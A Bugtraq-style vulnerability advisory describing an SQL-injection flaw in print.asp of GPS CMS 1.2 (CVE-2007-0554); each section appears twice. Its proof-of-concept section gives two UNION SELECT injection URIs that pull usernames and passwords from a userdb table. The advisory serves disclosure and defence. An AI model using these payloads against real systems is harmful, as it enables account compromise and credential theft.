GPS CMS Print.ASP SQL Injection Vulnerability
BID:22232
Info
GPS CMS Print.ASP SQL Injection Vulnerability
| Bugtraq ID: | 22232 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-0554 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 25 2007 12:00AM |
| Updated: | May 12 2015 07:35PM |
| Credit: | ajann is credited with the discovery of this vulnerability. |
| Vulnerable: |
Guo Xu GPS 1.2 |
| Not Vulnerable: | |
Discussion
GPS CMS Print.ASP SQL Injection Vulnerability
GPS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue affects version 1.2; other versions may also be vulnerable.
GPS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue affects version 1.2; other versions may also be vulnerable.
Exploit / POC
GPS CMS Print.ASP SQL Injection Vulnerability
Attackers can exploit this issue via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/print.asp?id=-1%20union%20select%200,0,0,Benutzername,0%20from%20userdb%20where%20ID=10
http://www.example.com/print.asp?id=-1%20union%20select%200,0,0,Passwort,0%20from%20userdb%20where%20ID=10
Attackers can exploit this issue via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/print.asp?id=-1%20union%20select%200,0,0,Benutzername,0%20from%20userdb%20where%20ID=10
http://www.example.com/print.asp?id=-1%20union%20select%200,0,0,Passwort,0%20from%20userdb%20where%20ID=10
Solution / Fix
GPS CMS Print.ASP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
GPS CMS Print.ASP SQL Injection Vulnerability
References:
References: